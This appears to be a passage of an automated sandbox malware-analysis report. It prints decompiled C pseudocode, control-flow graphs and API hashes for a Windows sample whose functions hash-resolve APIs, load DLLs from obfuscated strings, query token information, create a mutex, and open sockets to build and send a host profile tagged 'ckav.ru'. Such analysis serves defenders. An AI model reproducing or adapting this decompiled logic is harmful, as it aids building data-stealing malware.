                  control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062df call 4031e5 265->273 266->257 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                  C-Code - Quality: 75%
                  			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                  0x004061c3
                  0x004061cb
                  0x004061cd
                  0x004061d0
                  0x004061de
                  0x004061e0
                  0x004061e5
                  0x004061e9
                  0x004061eb
                  0x004061ed
                  0x004061f2
                  0x0040622a
                  0x00406230
                  0x00406235
                  0x00406239
                  0x0040623b
                  0x00406244
                  0x00406249
                  0x00406249
                  0x0040624c
                  0x00406253
                  0x00406256
                  0x00406258
                  0x00406261
                  0x00406266
                  0x00406266
                  0x00406270
                  0x00406273
                  0x00406276
                  0x0040627b
                  0x0040627e
                  0x0040628c
                  0x0040628e
                  0x00406290
                  0x00406295
                  0x0040629a
                  0x0040629e
                  0x004062a0
                  0x004062ac
                  0x004062af
                  0x004062b7
                  0x004062b9
                  0x004062c9
                  0x004062e0
                  0x004062e2
                  0x004062e4
                  0x004062f3
                  0x004062f3
                  0x004062e4
                  0x004062f8
                  0x004062fd
                  0x004062a0
                  0x004062fe
                  0x00406302
                  0x00406307
                  0x0040630c
                  0x0040630d
                  0x0040630f
                  0x00406312
                  0x00406317
                  0x00406318
                  0x0040631c
                  0x0040631e
                  0x00406321
                  0x00406326
                  0x00000000
                  0x00406327
                  0x004061f4
                  0x004061ff
                  0x00406208
                  0x00406218
                  0x0040621d
                  0x00406224
                  0x00406226
                  0x00406228
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406228
                  0x00406201
                  0x00000000

                  APIs
                  • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                  • _wmemset.LIBCMT ref: 00406244
                  • _wmemset.LIBCMT ref: 00406261
                  • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: _wmemset$ErrorInformationLastToken
                  • String ID: IDA$IDA
                  • API String ID: 487585393-2020647798
                  • Opcode ID: 09bc94978ef0cfa67adb0dd1c358d24fc5aa727ab36273feac3f2f200d8d5874
                  • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                  • Opcode Fuzzy Hash: 09bc94978ef0cfa67adb0dd1c358d24fc5aa727ab36273feac3f2f200d8d5874
                  • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                  C-Code - Quality: 37%
                  			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                  0x00404e1d
                  0x00404e26
                  0x00404e2a
                  0x00404e2f
                  0x00404e37
                  0x00404e3a
                  0x00404e45
                  0x00404e4f
                  0x00404e57
                  0x00404e61
                  0x00404e66
                  0x00404e68
                  0x00404e6c
                  0x00404e6e
                  0x00404e7a
                  0x00404e80
                  0x00404e84
                  0x00404e9f
                  0x00404ea7
                  0x00404eab
                  0x00404eb1
                  0x00404eb1
                  0x00404eb6
                  0x00404ebe
                  0x00404ecb
                  0x00000000
                  0x00404ec0
                  0x00404ec1
                  0x00404ec7
                  0x00404ec7
                  0x00404ecd
                  0x00000000
                  0x00404ece
                  0x00404ebe
                  0x00404e87
                  0x00404e90
                  0x00000000
                  0x00404e90
                  0x00000000

                  APIs
                  • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                  • socket.WS2_32(?,?,?), ref: 00404E7A
                  • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: freeaddrinfogetaddrinfosocket
                  • String ID:
                  • API String ID: 2479546573-0
                  • Opcode ID: cd1e8287def8bd693109279cc7574c8e7d85880b1aeaf44ebe350a6b8523ff17
                  • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                  • Opcode Fuzzy Hash: cd1e8287def8bd693109279cc7574c8e7d85880b1aeaf44ebe350a6b8523ff17
                  • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                  C-Code - Quality: 74%
                  			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                  0x004040c4
                  0x004040ce
                  0x004040d0
                  0x004040e8
                  0x004040ea
                  0x004040ec
                  0x004040f2
                  0x0040418d
                  0x00404190
                  0x00404184
                  0x00000000
                  0x00404184
                  0x004041a0
                  0x004041a5
                  0x004041a7
                  0x00000000
                  0x00000000
                  0x004041a9
                  0x004041b6
                  0x004041b8
                  0x004041be
                  0x004041cb
                  0x004041d0
                  0x004041d1
                  0x004041d3
                  0x004041d8
                  0x004041dc
                  0x00000000
                  0x004041e2
                  0x00404100
                  0x0040410c
                  0x00404111
                  0x0040417a
                  0x0040417a
                  0x00000000
                  0x0040411b
                  0x0040411b
                  0x00404120
                  0x00404122
                  0x00404122
                  0x0040412c
                  0x0040413a
                  0x0040413c
                  0x00404140
                  0x00000000
                  0x00404142
                  0x0040414a
                  0x00404155
                  0x0040415a
                  0x0040415e
                  0x00404168
                  0x00404174
                  0x00404176
                  0x00404176
                  0x0040417d
                  0x0040417e
                  0x00000000
                  0x00404183
                  0x00404140

                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AllocCreateReadVirtual
                  • String ID: .tmp
                  • API String ID: 3585551309-2986845003
                  • Opcode ID: 5d1d4d951f80304f6d94bcc895186941c41d2b8036c26940b1497ba8efd0f773
                  • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                  • Opcode Fuzzy Hash: 5d1d4d951f80304f6d94bcc895186941c41d2b8036c26940b1497ba8efd0f773
                  • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                  0x0041386f
                  0x0041387e
                  0x00413885
                  0x00413889
                  0x0041388c
                  0x00413890
                  0x00413893
                  0x00413897
                  0x0041389a
                  0x0041389e
                  0x004138a1
                  0x004138a5
                  0x004138a8
                  0x004138ac
                  0x004138af
                  0x004138b2
                  0x004138b5
                  0x004138b8
                  0x004138bb
                  0x004138bc
                  0x004138c4
                  0x004138c8
                  0x004138cb
                  0x004138cf
                  0x004138d2
                  0x004138d6
                  0x004138d7
                  0x004138df
                  0x004138e3
                  0x004138e4
                  0x004138ea
                  0x004138eb
                  0x004138f1
                  0x004138f5
                  0x004138f9
                  0x004138fd
                  0x00413901
                  0x00413905
                  0x00413909
                  0x0041390d
                  0x00413911
                  0x00413915
                  0x00413919
                  0x0041391d
                  0x00413921
                  0x00413925
                  0x00413929
                  0x0041392d
                  0x00413931
                  0x00413935
                  0x00413939
                  0x0041393d
                  0x00413941
                  0x00413950
                  0x00413959
                  0x0041395f
                  0x00413968
                  0x0041396e
                  0x00413973
                  0x00413977
                  0x00413979
                  0x00413980
                  0x00413982
                  0x00413991
                  0x0041399c
                  0x0041399e
                  0x004139a4
                  0x004139a9
                  0x004139ac
                  0x004139b1
                  0x004139b1
                  0x004139b2
                  0x004139b7
                  0x004139bc
                  0x004139c1
                  0x004139c7
                  0x004139cd
                  0x004139cd
                  0x004139db

                  APIs
                  • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                  • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                  • GetLastError.KERNEL32 ref: 0041399E
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: Error$CreateLastModeMutex
                  • String ID:
                  • API String ID: 3448925889-0
                  • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                  • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                  • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                  • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                  0x004042cf
                  0x004042d5
                  0x004042df
                  0x004042e2
                  0x004042f9
                  0x004042fb
                  0x00404300
                  0x0040430a
                  0x00404314
                  0x00404319
                  0x00404323
                  0x00404334
                  0x0040433b
                  0x0040433b
                  0x0040433f
                  0x00404344
                  0x0040434c

                  APIs
                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                  • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                  Memory Dump Source
                  • Source File: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_kVijllv0Yl.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CreatePointerWrite
                  • String ID:
                  • API String ID: 3672724799-0
                  • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                  • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                  • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                  • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 34%
                  			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                  0x00412d31
                  0x00412d34
                  0x00412d39
                  0x00412d3c
                  0x00412d49
                  0x00412d50
                  0x00412d52
                  0x00412f24
                  0x00412f24
                  0x00412f2b
                  0x00412f30
                  0x00412f32
                  0x00412f37
                  0x00412f41
                  0x00412f53
                  0x00412f53
                  0x00412f5b
                  0x00412f60
                  0x00412d58
                  0x00412d58
                  0x00412d63
                  0x00412d6c
                  0x00412d73
                  0x00412d7e
                  0x00412d7f
                  0x00412d80
                  0x00412d81
                  0x00412d82
                  0x00412d8f
                  0x00412da1
                  0x00412da6
                  0x00412dae
                  0x00412db0
                  0x00412db1
                  0x00412db5
                  0x00412dce
                  0x00412dcf
                  0x00412dd5
                  0x00412dda
                  0x00412db7
                  0x00412db7
                  0x00412db8
                  0x00412dbe
                  0x00412dc4
                  0x00412dc9
                  0x00412dc9
                  0x00412de2
                  0x00412de4
                  0x00412de5
                  0x00412de7
                  0x00412de9
                  0x00412e02
                  0x00412e03
                  0x00412e09
                  0x00412e0e
                  0x00412deb
                  0x00412deb
                  0x00412dec
                  0x00412df2
                  0x00412df8
                  0x00412dfd
                  0x00412dfd
                  0x00412e11
                  0x00412e17
                  0x00412e19
                  0x00412e1a
                  0x00412e1e
                  0x00412e37
                  0x00412e38
                  0x00412e3e
                  0x00412e43
                  0x00412e20
                  0x00412e20
                  0x00412e21
                  0x00412e27
                  0x00412e2d
                  0x00412e32
                  0x00412e32
                  0x00412e4b
                  0x00412e4d
